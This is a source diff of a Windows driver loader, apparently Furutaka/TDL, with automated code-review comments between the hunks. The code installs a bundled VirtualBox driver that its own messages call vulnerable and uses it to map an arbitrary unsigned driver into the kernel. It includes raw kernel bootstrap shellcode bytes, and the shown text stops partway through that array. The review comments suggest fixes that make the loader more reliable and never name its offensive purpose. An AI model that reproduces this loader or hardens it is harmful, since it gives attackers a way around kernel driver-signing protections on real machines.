@@ -510,123 +510,123 @@ UINT TDLMapDriver( * */ HANDLE TDLStartVulnerableDriver( - VOID - ) + VOID +) { - PBYTE DrvBuffer; - ULONG DataSize = 0, bytesIO; - HANDLE hDevice = INVALID_HANDLE_VALUE; - WCHAR szDriverFileName[MAX_PATH * 2]; - SC_HANDLE schSCManager = NULL; - LPWSTR msg; + PBYTE DrvBuffer; + ULONG DataSize = 0, bytesIO; + HANDLE hDevice = INVALID_HANDLE_VALUE; + WCHAR szDriverFileName[MAX_PATH * 2]; + SC_HANDLE schSCManager = NULL; + LPWSTR msg; - DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); - while (DrvBuffer != NULL) { + DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize); + while (DrvBuffer != NULL) { - //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. - RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); - if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { + //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. + RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); + if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); - if (schSCManager == NULL) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error opening SCM database"), - g_ConsoleOutput, TRUE); + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Error opening SCM database"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive - if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Active 
VirtualBox found in system, attempt unload it"), - g_ConsoleOutput, TRUE); + //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive + if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), + g_ConsoleOutput, TRUE); - if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxNetAdp driver unloaded"), - g_ConsoleOutput, TRUE); - } - if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxNetLwf driver unloaded"), - g_ConsoleOutput, TRUE); - } - if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxUSBMon driver unloaded"), - g_ConsoleOutput, TRUE); - } - Sleep(1000); - if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { - cuiPrintText(g_ConOut, - TEXT("SCM: VBoxDrv driver unloaded"), - g_ConsoleOutput, TRUE); - } - } + if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetAdp driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxNetLwf driver unloaded"), + g_ConsoleOutput, TRUE); + } + if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxUSBMon driver unloaded"), + g_ConsoleOutput, TRUE); + } + Sleep(1000); + if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { + cuiPrintText(g_ConOut, + TEXT("SCM: VBoxDrv driver unloaded"), + g_ConsoleOutput, TRUE); + } + } - //if vbox installed backup it driver, do it before dropping our - if (g_VBoxInstalled) { - if (supBackupVBoxDrv(FALSE) == FALSE) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error while doing VirtualBox driver backup"), - g_ConsoleOutput, TRUE); + //if vbox installed backup it driver, do it before dropping our + if (g_VBoxInstalled) { + if (supBackupVBoxDrv(FALSE) == FALSE) { + 
cuiPrintText(g_ConOut, + TEXT("Ldr: Error while doing VirtualBox driver backup"), + g_ConsoleOutput, TRUE); - break; - } - } + break; + } + } - //drop our vboxdrv version - _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); - bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, - (SIZE_T)DataSize, FALSE, FALSE); + //drop our vboxdrv version + _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); + bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer, + (SIZE_T)DataSize, FALSE, FALSE); - if (bytesIO != DataSize) { + if (bytesIO != DataSize) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Error writing VirtualBox on disk"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("Ldr: Error writing VirtualBox on disk"), + g_ConsoleOutput, TRUE); - break; - } + break; + } - //if vbox not found in system install driver in scm - if (g_VBoxInstalled == FALSE) { - scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); - } + //if vbox not found in system install driver in scm + if (g_VBoxInstalled == FALSE) { + scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); + } - //run driver - if (scmStartDriver(schSCManager, VBoxDrvSvc) == TRUE) { + //run driver + if (scmStartDriver(schSCManager, VBoxDrvSvc) != FALSE) { - if (scmOpenDevice(VBoxDrvSvc, &hDevice)) - msg = TEXT("SCM: Vulnerable driver loaded and opened"); - else - msg = TEXT("SCM: Driver device open failure"); + if (scmOpenDevice(VBoxDrvSvc, &hDevice)) + msg = TEXT("SCM: Vulnerable driver loaded and opened"); + else + msg = TEXT("SCM: Driver device open failure"); - } - else { - msg = TEXT("SCM: Vulnerable driver load failure"); - } + } + else { + msg = TEXT("SCM: Vulnerable driver load failure"); + } - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - break; - } + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + break; + } - //post cleanup - if (schSCManager != NULL) { - CloseServiceHandle(schSCManager); - } - return hDevice; + //post cleanup + if 
(schSCManager != NULL) { + CloseServiceHandle(schSCManager); + } + return hDevice; } /* 
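Review bot: When `supWriteBufferToFile` returns a short count the function breaks out after the original `VBoxDrv.sys` has already been backed up and overwritten, so a truncated driver file is left in `drivers\` and nothing restores it; on that path, when `g_VBoxInstalled` is set, call `supBackupVBoxDrv(TRUE)` before the `break`, mirroring what `TDLStopVulnerableDriver` does. The return value of `scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName)` is also discarded, so a failed service registration only surfaces later as "Vulnerable driver load failure"; `if (!scmInstallDriver(...)) { cuiPrintText(g_ConOut, TEXT("SCM: Driver install failure"), g_ConsoleOutput, TRUE); break; }` names the real cause. `DrvBuffer` from `supQueryResourceData` is never released in this function — fine if it points into the mapped resource, but that cannot be confirmed from here and deserves a comment at the call.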
@@ -638,72 +638,74 @@ HANDLE TDLStartVulnerableDriver( * */ void TDLStopVulnerableDriver( - VOID - ) + VOID +) { - SC_HANDLE schSCManager; - LPWSTR msg; - UNICODE_STRING uStr; - OBJECT_ATTRIBUTES ObjectAttributes; + SC_HANDLE schSCManager; + LPWSTR msg; + UNICODE_STRING uStr; + OBJECT_ATTRIBUTES ObjectAttributes; - cuiPrintText(g_ConOut, - TEXT("SCM: Unloading vulnerable driver"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("SCM: Unloading vulnerable driver"), + g_ConsoleOutput, TRUE); - if (g_hVBox != INVALID_HANDLE_VALUE) - CloseHandle(g_hVBox); + if (g_hVBox != INVALID_HANDLE_VALUE) + CloseHandle(g_hVBox); - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); - if (schSCManager == NULL) { - cuiPrintText(g_ConOut, - TEXT("SCM: Cannot open database, unable unload driver"), - g_ConsoleOutput, TRUE); - return; - } + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("SCM: Cannot open database, unable unload driver"), + g_ConsoleOutput, TRUE); + return; + } + //stop driver in any case + if (scmStopDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Vulnerable driver successfully unloaded"); + else + msg = TEXT("SCM: Unexpected error while unloading driver"); - //stop driver in any case - if (scmStopDriver(schSCManager, VBoxDrvSvc)) - msg = TEXT("SCM: Vulnerable driver successfully unloaded"); - else - msg = TEXT("SCM: Unexpected error while unloading driver"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + //if VBox not installed - remove from scm database and delete file + if (g_VBoxInstalled == FALSE) { - //if VBox not installed - remove from scm database and delete file - if (g_VBoxInstalled == FALSE) { + if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Driver entry removed from registry"); + else + msg = TEXT("SCM: Error removing driver entry from registry"); - if 
(scmRemoveDriver(schSCManager, VBoxDrvSvc)) - msg = TEXT("SCM: Driver entry removed from registry"); - else - msg = TEXT("SCM: Error removing driver entry from registry"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + uStr.Buffer = NULL; + uStr.Length = 0; + uStr.MaximumLength = 0; + RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); + InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); + if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) + msg = TEXT("Ldr: Driver file removed"); + else + msg = TEXT("Ldr: Error removing driver file"); - RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); - InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); - if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) - msg = TEXT("Ldr: Driver file removed"); - else - msg = TEXT("Ldr: Error removing driver file"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + else { + //VBox software present, restore original driver and exit + if (supBackupVBoxDrv(TRUE)) + msg = TEXT("Ldr: Original driver restored"); + else + msg = TEXT("Ldr: Unexpected error while restoring original driver"); - } - else { - //VBox software present, restore original driver and exit - if (supBackupVBoxDrv(TRUE)) - msg = TEXT("Ldr: Original driver restored"); - else - msg = TEXT("Ldr: Unexpected error while restoring original driver"); - - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - } - CloseServiceHandle(schSCManager); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + CloseServiceHandle(schSCManager); } /* 
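Review bot: The three assignments added before `RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\...")` are dead stores — `RtlInitUnicodeString` sets `Buffer`, `Length` and `MaximumLength` itself — so they can be dropped, or, if the aim was to quiet an uninitialised-variable warning, `RtlSecureZeroMemory(&uStr, sizeof(uStr));` matches how `TDLMapDriver` prepares its `uStr`. Separately, `g_hVBox` is closed at the top of the function but never reset, unlike the cleanup in `TDLExploit` which sets it back to `INVALID_HANDLE_VALUE`; add `g_hVBox = INVALID_HANDLE_VALUE;` after the `CloseHandle` so no later path can close a stale handle value. The service entry is removed and the file deleted even when `scmStopDriver` reported failure, which the "stop driver in any case" comment intends, but the message for that case should say the driver may still be resident, e.g. `"SCM: Unexpected error while unloading driver, it may still be loaded"`.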
@@ -715,37 +717,37 @@ void TDLStopVulnerableDriver( * */ UINT TDLProcessCommandLine( - LPWSTR lpCommandLine - ) + LPWSTR lpCommandLine +) { - UINT retVal = (UINT)-1; - WCHAR szInputFile[MAX_PATH + 1]; - ULONG c; - - //input file - c = 0; - RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); - GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); - if (c == 0) { - cuiPrintText(g_ConOut, - T_LOADERUSAGE, - g_ConsoleOutput, FALSE); - return retVal; - } + UINT retVal = (UINT)-1; + WCHAR szInputFile[MAX_PATH + 1]; + ULONG c; - if (PathFileExists(szInputFile)) { - g_hVBox = TDLStartVulnerableDriver(); - if (g_hVBox != INVALID_HANDLE_VALUE) { - retVal = TDLMapDriver(szInputFile); - TDLStopVulnerableDriver(); - } - } - else { - cuiPrintText(g_ConOut, - TEXT("Ldr: Input file not found"), - g_ConsoleOutput, FALSE); - } - return retVal; + //input file + c = 0; + RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); + GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); + if (c == 0) { + cuiPrintText(g_ConOut, + T_LOADERUSAGE, + g_ConsoleOutput, FALSE); + return retVal; + } + + if (PathFileExists(szInputFile)) { + g_hVBox = TDLStartVulnerableDriver(); + if (g_hVBox != INVALID_HANDLE_VALUE) { + retVal = TDLMapDriver(szInputFile); + TDLStopVulnerableDriver(); + } + } + else { + cuiPrintText(g_ConOut, + TEXT("Ldr: Input file not found"), + g_ConsoleOutput, FALSE); + } + return retVal; } /* 
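Review bot: `PathFileExists(szInputFile)` resolves a non-absolute name against the current directory, but the same string is then handed to `LdrLoadDll(NULL, NULL, &uStr, ...)` in `TDLMapDriver`, whose lookup for a bare filename follows the loader search order rather than the CWD, so a name can pass the existence check and map a different file before the vulnerable driver is already loaded. `PathFileExists` also returns TRUE for a directory, which would then fail inside `LdrLoadDll` with the less specific "Error while loading input driver file". Canonicalising with `GetFullPathName` into a second buffer and rejecting directories before `TDLStartVulnerableDriver` is called addresses both and costs a handful of lines, sketched below.
```c
    WCHAR szFullPath[MAX_PATH + 1];
    // ... unchanged: GetCommandLineParam and usage message ...
    RtlSecureZeroMemory(szFullPath, sizeof(szFullPath));
    c = GetFullPathName(szInputFile, MAX_PATH, szFullPath, NULL);
    if (c == 0 || c > MAX_PATH || PathIsDirectory(szFullPath) || !PathFileExists(szFullPath)) {
        cuiPrintText(g_ConOut, TEXT("Ldr: Input file not found"), g_ConsoleOutput, FALSE);
        return retVal;
    }
    g_hVBox = TDLStartVulnerableDriver();
    if (g_hVBox != INVALID_HANDLE_VALUE) {
        retVal = TDLMapDriver(szFullPath);
        TDLStopVulnerableDriver();
    }
```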
@@ -759,80 +761,81 @@ UINT TDLProcessCommandLine( void TDLMain() { - BOOL cond = FALSE; - UINT uResult = 0; - DWORD dwTemp; - LONG x; - OSVERSIONINFOW osv; - WCHAR text[256]; + BOOL cond = FALSE; + UINT uResult = 0; + DWORD dwTemp; + LONG x; + OSVERSIONINFOW osv; + WCHAR text[256]; - __security_init_cookie(); + __security_init_cookie(); - do { - g_hInstance = GetModuleHandle(NULL); + do { - g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); - if (g_ConOut == INVALID_HANDLE_VALUE) { - uResult = (UINT)-1; - break; - } + g_hInstance = GetModuleHandle(NULL); - g_ConsoleOutput = TRUE; - if (!GetConsoleMode(g_ConOut, &dwTemp)) { - g_ConsoleOutput = FALSE; - } + g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); + if (g_ConOut == INVALID_HANDLE_VALUE) { + uResult = (UINT)-1; + break; + } - SetConsoleTitle(T_LOADERTITLE); - SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); - if (g_ConsoleOutput == FALSE) { - WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL); - } + g_ConsoleOutput = TRUE; + if (!GetConsoleMode(g_ConOut, &dwTemp)) { + g_ConsoleOutput = FALSE; + } - cuiPrintText(g_ConOut, - T_LOADERINTRO, - g_ConsoleOutput, TRUE); + SetConsoleTitle(T_LOADERTITLE); + SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); + if (g_ConsoleOutput == FALSE) { + WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL); + } + + cuiPrintText(g_ConOut, + T_LOADERINTRO, + g_ConsoleOutput, TRUE); - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); - if (x > 1) { - cuiPrintText(g_ConOut, - T_LOADERRUN, - g_ConsoleOutput, FALSE); - uResult = (UINT)-1; - break; - } + x = InterlockedIncrement((PLONG)&g_lApplicationInstances); + if (x > 1) { + cuiPrintText(g_ConOut, + T_LOADERRUN, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } - //check version first - RtlSecureZeroMemory(&osv, sizeof(osv)); - osv.dwOSVersionInfoSize = sizeof(osv); - RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); - if (osv.dwMajorVersion < 
6) { - cuiPrintText(g_ConOut, - T_LOADERUNSUP, - g_ConsoleOutput, FALSE); - uResult = (UINT)-1; - break; - } + //check version first + RtlSecureZeroMemory(&osv, sizeof(osv)); + osv.dwOSVersionInfoSize = sizeof(osv); + RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); + if (osv.dwMajorVersion < 6) { + cuiPrintText(g_ConOut, + T_LOADERUNSUP, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } - _strcpy(text, TEXT("Ldr: Windows v")); - ultostr(osv.dwMajorVersion, _strend(text)); - _strcat(text, TEXT(".")); - ultostr(osv.dwMinorVersion, _strend(text)); - _strcat(text, TEXT(" build ")); - ultostr(osv.dwBuildNumber, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + _strcpy(text, TEXT("Ldr: Windows v")); + ultostr(osv.dwMajorVersion, _strend(text)); + _strcat(text, TEXT(".")); + ultostr(osv.dwMinorVersion, _strend(text)); + _strcat(text, TEXT(" build ")); + ultostr(osv.dwBuildNumber, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - g_VBoxInstalled = TDLVBoxInstalled(); - if (g_VBoxInstalled) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Warning VirtualBox software installed, conficts possible"), - g_ConsoleOutput, TRUE); - } + g_VBoxInstalled = TDLVBoxInstalled(); + if (g_VBoxInstalled) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Warning, VirtualBox software installed, conflicts are possible"), + g_ConsoleOutput, TRUE); + } - uResult = TDLProcessCommandLine(GetCommandLine()); + uResult = TDLProcessCommandLine(GetCommandLine()); - } while (cond); + } while (cond); - InterlockedDecrement((PLONG)&g_lApplicationInstances); - ExitProcess(uResult); + InterlockedDecrement((PLONG)&g_lApplicationInstances); + ExitProcess(uResult); } diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc index b664ad4..351f442 100644 Binary files a/Source/Furutaka/resource.rc and b/Source/Furutaka/resource.rc differ diff --git a/Source/Furutaka/shellcode.h b/Source/Furutaka/shellcode.h index d91f0bc..469aa42 100644 
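Review bot: `GetStdHandle(STD_OUTPUT_HANDLE)` returns NULL rather than `INVALID_HANDLE_VALUE` when the process has no standard output, so the guard after it should read `if (g_ConOut == INVALID_HANDLE_VALUE || g_ConOut == NULL)`; otherwise every later `cuiPrintText` and the `WriteFile` of `g_BE` run on a NULL handle. The single-instance check via `InterlockedIncrement((PLONG)&g_lApplicationInstances)` can only see other processes if that variable lives in a shared (RWS) section, and its declaration is outside this hunk; a comment at the check such as `// relies on g_lApplicationInstances being in a shared section, otherwise x is always 1` would make the dependency visible to the next reader. `SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT)` applies input-mode flags to an output handle; only `ENABLE_PROCESSED_OUTPUT` is meaningful there, and the call's result is not checked, so either trim the flags or drop the call. `TDLMain` is complete within this hunk.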
--- a/Source/Furutaka/shellcode.h +++ b/Source/Furutaka/shellcode.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SHELLCODE.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 30 Jan 2016 +* DATE: 17 Apr 2017 * * Loader bootstrap shellcode. * @@ -20,20 +20,20 @@ #pragma once typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)( - _In_ POOL_TYPE PoolType, - _In_ SIZE_T NumberOfBytes, - _In_ ULONG Tag - ); + _In_ POOL_TYPE PoolType, + _In_ SIZE_T NumberOfBytes, + _In_ ULONG Tag + ); typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( - _Out_ PHANDLE ThreadHandle, - _In_ ULONG DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ HANDLE ProcessHandle, - _Out_opt_ PCLIENT_ID ClientId, - _In_ PKSTART_ROUTINE StartRoutine, - _In_opt_ PVOID StartContext - ); + _Out_ PHANDLE ThreadHandle, + _In_ ULONG DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ HANDLE ProcessHandle, + _Out_opt_ PCLIENT_ID ClientId, + _In_ PKSTART_ROUTINE StartRoutine, + _In_opt_ PVOID StartContext + ); /* * TDLBootstrapLoader 
@@ -45,101 +45,101 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( */ /* void TDLBootstrapLoader( - PfnExAllocatePoolWithTag ExAllocatePoolWithTag, - PfnPsCreateSystemThread PsCreateSystemThread) + PfnExAllocatePoolWithTag ExAllocatePoolWithTag, + PfnPsCreateSystemThread PsCreateSystemThread) { - ULONG_PTR pos, exbuffer, - Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; + ULONG_PTR pos, exbuffer, + Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; - PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; - PIMAGE_FILE_HEADER fileh = - (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); + PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; + PIMAGE_FILE_HEADER fileh = + (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); - PIMAGE_OPTIONAL_HEADER popth = - (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); - ULONG isz = popth->SizeOfImage; - HANDLE th; + ULONG isz = popth->SizeOfImage; + HANDLE th; - PIMAGE_BASE_RELOCATION rel; - DWORD_PTR delta; - LPWORD chains; - DWORD c, p, rsz; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; - OBJECT_ATTRIBUTES attr; + OBJECT_ATTRIBUTES attr; - exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( - NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; - exbuffer &= ~(PAGE_SIZE - 1); + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); - if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) - if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) - { - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + - popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = 
(PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; - delta = (DWORD_PTR)exbuffer - popth->ImageBase; - c = 0; + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; - while (c < rsz) { - p = sizeof(IMAGE_BASE_RELOCATION); - chains = (LPWORD)((PBYTE)rel + p); + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); - while (p < rel->SizeOfBlock) { + while (p < rel->SizeOfBlock) { - switch (*chains >> 12) { - case IMAGE_REL_BASED_HIGHLOW: - *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; - break; - case IMAGE_REL_BASED_DIR64: - *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; - break; - } + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } - chains++; - p += sizeof(WORD); - } + chains++; + p += sizeof(WORD); + } - c += rel->SizeOfBlock; - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); - } - } + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } - isz >>= 3; - for (pos = 0; pos < isz; pos++) - ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; - InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); - PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, - (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); + InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); + PsCreateSystemThread(&th, THREAD_ALL_ACCESS, 
&attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); } */ static const unsigned char TDLBootstrapLoader_code[415] = { - 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, - 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, - 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, - 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, - 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, - 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, - 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, - 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, - 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, - 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, - 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, - 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, - 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, - 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, - 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, - 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 